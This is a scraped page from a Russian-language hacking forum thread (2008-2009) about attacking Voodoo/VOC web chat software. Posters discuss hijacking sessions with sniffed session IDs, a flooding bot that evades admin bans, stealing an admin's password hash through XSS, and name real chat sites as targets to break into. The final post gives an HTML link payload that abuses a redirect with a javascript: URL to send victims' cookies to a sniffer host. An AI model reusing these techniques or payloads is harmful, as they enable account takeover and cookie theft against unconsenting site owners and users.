HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Чаты
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #231  
Старый 08.06.2008, 18:28
bloodAngel
Новичок
Регистрация: 29.06.2007
Сообщений: 18
С нами: 9930159

Репутация: 17
По умолчанию

привет парни! у меня проблема из таким чатом!!! я не могу восползоватса сесией !я из Укр. я перехватил сесию и немогу ей воспользоватса!!

Последний раз редактировалось bloodAngel; 16.12.2008 в 19:32..
 

  #232  
Старый 27.06.2008, 20:23
F3x111TsSL
Познающий
Регистрация: 23.06.2008
Сообщений: 53
С нами: 9411548

Репутация: 6
По умолчанию

получал доступ по ИД сессии
ИД получал при помощи снифера
все просто

очень жаль что чат который меня интересует при смене пароля требует старый пароль поэтому даже с панели управления ник не угнать. только напакостить можно

давайте вместе подумаем как обойти подтверждение старого пароля при смене оного
 

  #233  
Старый 10.12.2008, 20:07
Invision
Новичок
Регистрация: 24.08.2008
Сообщений: 29
С нами: 9322476

Репутация: 1
По умолчанию

Вот убитый чат: http://pro-chat.tomsk.ru
перфикс chat/ - работает на voodoo =)
 

  #234  
Старый 11.12.2008, 18:12
NModern
Новичок
Регистрация: 10.12.2008
Сообщений: 3
С нами: 9168139

Репутация: 0
По умолчанию

кто может дать сниффер????



дам мазгадёра для воодоо.

принцип работы: автоматом заходит на чат и выходит из чата

а в чате пишется например

12:01:01 Вася зашел
12:01:02 Вася вышел
12:01:03 Вася зашел
12:01:04 Вася вышел

и этим чат заполняется

а админ не может выгнат потому что сессия каждый раз меняется

можно выгнать через offban если есть
_________________________

и почему никто не пишет что если захватить сессию можно и "voc.php?session=сессия" написать и зайти. откроется весь чат а не только sender.php

и есть кто нибудь с кем можно было бы посаветоватся по темам ява, пхп
 

  #235  
Старый 03.01.2009, 14:43
Nitrogeniys
Новичок
Регистрация: 25.12.2008
Сообщений: 22
С нами: 9145323

Репутация: 11
По умолчанию

Лучше залей на сайт снифер в место авы и сиди болдей!
 

  #236  
Старый 11.01.2009, 14:52
Sheffavenger
Новичок
Регистрация: 25.12.2008
Сообщений: 1
С нами: 9146524

Репутация: 0
По умолчанию

так как С VOC++ Business Special Edition рабочие взломы админки есть?или никто ещё непридумал?
 

  #237  
Старый 12.01.2009, 23:07
Giiiiig
Новичок
Регистрация: 11.01.2009
Сообщений: 1
С нами: 9120704

Репутация: 0
По умолчанию

skajite rebiata shtoza versia

http://www.akoce.com


i kak mne dastats hash admina ia sdelal

xss no kinul mne svou hash no ia xochu hash admina

voobshem versiu skajite ((
 

  #238  
Старый 09.02.2009, 00:27
SmоrK
Новичок
Регистрация: 19.01.2009
Сообщений: 28
С нами: 9109480

Репутация: 49
Wink

Цитата:
Сообщение от Giiiiig  
skajite rebiata shtoza versia

http://www.akoce.com


i kak mne dastats hash admina ia sdelal

xss no kinul mne svou hash no ia xochu hash admina

voobshem versiu skajite ((
обычный вуду тока с обложкой красиваой!
язык на чате фиг его знает орабский какойто!
версия 0.18.16
-=-=-=-=-=-=-=-=-=

NModern закинь сюда мазгадёра

а в чате пишется например

12:01:01 Вася зашел
12:01:02 Вася вышел
12:01:03 Вася зашел
12:01:04 Вася вышел

и этим чат заполняется

Последний раз редактировалось SmоrK; 09.02.2009 в 00:44..
 

  #239  
Старый 14.02.2009, 12:44
gold_555
Новичок
Регистрация: 14.02.2009
Сообщений: 2
С нами: 9072948

Репутация: 0
По умолчанию

Всем привет! Ребят, протестите плиз вот этот чат http://licey24.lipetsk.ru/chat Админ полный ламер, недавно хоть догодался закрыть директорию http://licey24.lipetsk.ru/data через .htaccess
 

  #240  
Старый 14.02.2009, 12:56
gold_555
Новичок
Регистрация: 14.02.2009
Сообщений: 2
С нами: 9072948

Репутация: 0
По умолчанию

У меня хоть и не большие познания в javascript могу я следующим образом получить куки пользователя:

Кидаю к примеру ссыль юзеру в чат http://site.ru/file.html

file.html содержит следующий код
PHP код:
<a href="http://chatname.ru/go.php?url=javascript:window.location.href='http://site.ru/sniffer/'">Click</a
Т.е смысл следующий юзер щелкает по ссылке и переходит по адрксу http://site.ru/file.html, оттуда он переадресуется на страницу чата http://chatname.ru/go.php, выполняется java script по переходу на страницу со снифером, снифер читает куки

Такое реально???
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.